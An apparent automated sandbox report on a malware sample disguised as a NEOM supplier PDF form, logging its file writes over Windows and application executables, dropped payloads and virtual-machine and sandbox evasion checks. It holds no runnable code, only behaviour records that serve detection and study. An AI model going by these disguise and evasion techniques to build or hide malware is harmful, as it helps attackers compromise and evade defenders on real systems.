Source: Possible double extension: pdf.exe Static PE information: NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE
Writes data at the end of the disk (often used by bootkits to hide malicious code)
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Users\user\AppData\Roaming\52b8592e4ce608d8.bin offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 162304
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 735820
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 737280
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1285120
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1286144
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1289427
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 735744
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 31704
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Users\user\AppData\Local\Temp\aut72FF.tmp offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Users\user\AppData\Local\Temp\aut72FF.tmp offset: 1290240
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Users\user\AppData\Local\Temp\Sancha offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Users\user\AppData\Local\Temp\Sancha offset: 1310720
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Users\user\AppData\Local\Temp\Sancha offset: 1372160
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Users\user\AppData\Local\Temp\Grinnellia offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Users\user\AppData\Local\Temp\Grinnellia offset: 196608
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Users\user\AppData\Local\Temp\Grinnellia offset: 200704
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\alg.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\alg.exe offset: 95744
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\alg.exe offset: 669260
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\alg.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\alg.exe offset: 672768
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\alg.exe offset: 1220608
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\alg.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\alg.exe offset: 1221632
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\alg.exe offset: 1224840
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\alg.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\alg.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\alg.exe offset: 669184
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\alg.exe offset: 53125
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\alg.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\AppVClient.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\AppVClient.exe offset: 767488
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\AppVClient.exe offset: 1341004
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\AppVClient.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\AppVClient.exe offset: 1344512
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\AppVClient.exe offset: 1347720
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\AppVClient.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\AppVClient.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\AppVClient.exe offset: 1340928
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\AppVClient.exe offset: 409168
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\AppVClient.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 94208
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 667724
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 671232
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 1219072
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 1220096
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 1223304
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 667648
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 50277
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE File written: C:\Windows\System32\FXSSVC.exe offset: unknown
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE API/Special instruction interceptor: Address: 5463204
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE API/Special instruction interceptor: Address: 5333204
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 1770000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 30D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: 50D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 2FB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 3220000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Memory allocated: 3140000 memory reserve | memory write watch
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window / User API: threadDelayed 1048
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Window / User API: threadDelayed 8792
Found dropped PE file which has not been started or loaded
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler64.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe Jump to dropped file
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\7z.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe Jump to dropped file
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to dropped file
